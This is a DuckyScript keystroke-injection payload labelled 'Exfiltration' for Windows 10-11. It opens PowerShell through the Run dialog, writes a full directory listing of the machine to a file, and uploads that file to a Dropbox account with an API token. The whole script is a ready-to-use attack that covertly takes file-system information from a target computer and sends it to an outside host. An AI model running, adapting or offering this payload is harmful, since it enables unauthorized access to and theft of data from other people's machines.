REM ###########################################################
REM #                                                         |
REM # Title        : Tree Structure Of The Operating System   |
REM # Author       : Aleff                                    |
REM # Version      : 1.0                                      |
REM # Category     : Exfiltration                             |
REM # Target       : Windows 10-11                            |
REM #                                                         |
REM ###########################################################

REM Requirements:
REM     - Internet connection

DELAY 2000

GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000

REM Setting about exfiltration
STRINGLN
    tree /f /a > out.txt
    $filePath=".\out.txt";
    $accessToken="DROPBOX_ACCESS_TOKEN"
    $authHeader = @{Authorization = "Bearer $accessToken"}
    $dropboxFilePath = "/out_exported.txt"

    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"

    $headers = @{}
    $headers.Add("Authorization", "Bearer $accessToken")
    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
    $headers.Add("Content-Type", "application/octet-stream")

    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -InFile $filePath;
END_STRINGLN
